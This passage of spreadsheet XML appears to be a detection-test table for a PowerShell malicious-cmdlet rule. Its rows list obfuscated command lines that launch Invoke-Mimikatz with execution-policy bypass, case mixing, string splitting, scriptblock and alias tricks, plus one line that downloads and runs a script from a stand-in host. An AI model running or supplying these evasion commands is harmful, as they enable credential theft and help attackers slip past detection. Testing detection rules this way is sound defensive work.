    <row r="2727" ht="15.75" customHeight="1" s="42">
      <c r="A2727" s="43" t="n"/>
      <c r="B2727" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2727" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2727" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2727" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2727" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2727" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2728" ht="15.75" customHeight="1" s="42">
      <c r="A2728" s="43" t="n"/>
      <c r="B2728" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2728" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2728" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2728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728" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2728" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2728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28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2728" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2729" ht="15.75" customHeight="1" s="42">
      <c r="A2729" s="43" t="n"/>
      <c r="B2729" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2729" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2729" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2729" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2729" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2729" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2729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29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2729" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2730" ht="15.75" customHeight="1" s="42">
      <c r="A2730" s="43" t="n"/>
      <c r="B2730" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2730" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2730" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2730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730" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2730" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2730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30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2730" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2731" ht="15.75" customHeight="1" s="42">
      <c r="A2731" s="43" t="n"/>
      <c r="B2731" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2731" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2731" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2731" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2731" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2731" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2731" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2731" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2731" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2732" ht="15.75" customHeight="1" s="42">
      <c r="A2732" s="43" t="n"/>
      <c r="B2732" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2732" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2732" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2732" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2732" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2732" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2732" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2732" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2732" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2733" ht="15.75" customHeight="1" s="42">
      <c r="A2733" s="43" t="n"/>
      <c r="B2733" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2733" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2733" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2733" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2733" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2733" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2733" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2734" ht="15.75" customHeight="1" s="42">
      <c r="A2734" s="43" t="n"/>
      <c r="B2734" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2734" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2734" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2734" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2734" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2734" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2734" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2735" ht="15.75" customHeight="1" s="42">
      <c r="A2735" s="43" t="n"/>
      <c r="B2735" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2735" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2735" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2735" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2735" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2735" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2735" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2736" ht="15.75" customHeight="1" s="42">
      <c r="A2736" s="43" t="n"/>
      <c r="B2736" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2736" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2736" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2736" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2736" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2736" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2736" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2737" ht="15.75" customHeight="1" s="42">
      <c r="A2737" s="43" t="n"/>
      <c r="B2737" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2737" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2737" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2737" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2737" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2737" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2737" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2738" ht="15.75" customHeight="1" s="42">
      <c r="A2738" s="43" t="n"/>
      <c r="B2738" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2738" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2738" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2738" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2738" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2738" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2738" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2739" ht="15.75" customHeight="1" s="42">
      <c r="A2739" s="43" t="n"/>
      <c r="B2739" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2739" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2739" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2739" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2739" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2739" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2739" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2740" ht="15.75" customHeight="1" s="42">
      <c r="A2740" s="43" t="n"/>
      <c r="B2740" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2740" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2740" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2740" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2740" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2740" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2740" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2741" ht="15.75" customHeight="1" s="42">
      <c r="A2741" s="43" t="n"/>
      <c r="B2741" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2741" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2741" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2741" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2741" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2741" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2741" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2742" ht="15.75" customHeight="1" s="42">
      <c r="A2742" s="43" t="n"/>
      <c r="B2742" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2742" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2742" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2742" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2742" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2742" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2742" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2743" ht="15.75" customHeight="1" s="42">
      <c r="A2743" s="43" t="n"/>
      <c r="B2743" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2743" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2743" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2743" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I274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43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2743" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2744" ht="15.75" customHeight="1" s="42">
      <c r="A2744" s="43" t="n"/>
      <c r="B2744" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2744" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2744" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2744" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I274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44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2744" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2745" ht="15.75" customHeight="1" s="42">
      <c r="A2745" s="43" t="n"/>
      <c r="B2745" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2745" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2745" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2745" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I274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45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2745" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2746" ht="15.75" customHeight="1" s="42">
      <c r="A2746" s="43" t="n"/>
      <c r="B2746" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2746" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2746" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2746" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2746" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2746" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2747" ht="15.75" customHeight="1" s="42">
      <c r="A2747" s="44" t="n"/>
      <c r="B2747" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2747" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2747" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2747" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2747" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2747" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2747" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2748" ht="15.75" customHeight="1" s="42">
      <c r="A2748" s="44" t="n"/>
      <c r="B2748" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2748" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2748" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2748" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2748" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2748" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2748" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2748" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2748" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2749" ht="15.75" customHeight="1" s="42">
      <c r="A2749" s="43" t="n"/>
      <c r="B2749" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2749" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2749" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2749" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2749" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2749" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2749" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2750" ht="15.75" customHeight="1" s="42">
      <c r="A2750" s="43" t="n"/>
      <c r="B2750" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2750" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2750" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2750" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2750" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2750" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2750" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2751" ht="15.75" customHeight="1" s="42">
      <c r="A2751" s="43" t="n"/>
      <c r="B2751" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2751" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2751" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2751" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2751" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2751" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2751" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2752" ht="15.75" customHeight="1" s="42">
      <c r="A2752" s="43" t="n"/>
      <c r="B2752" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
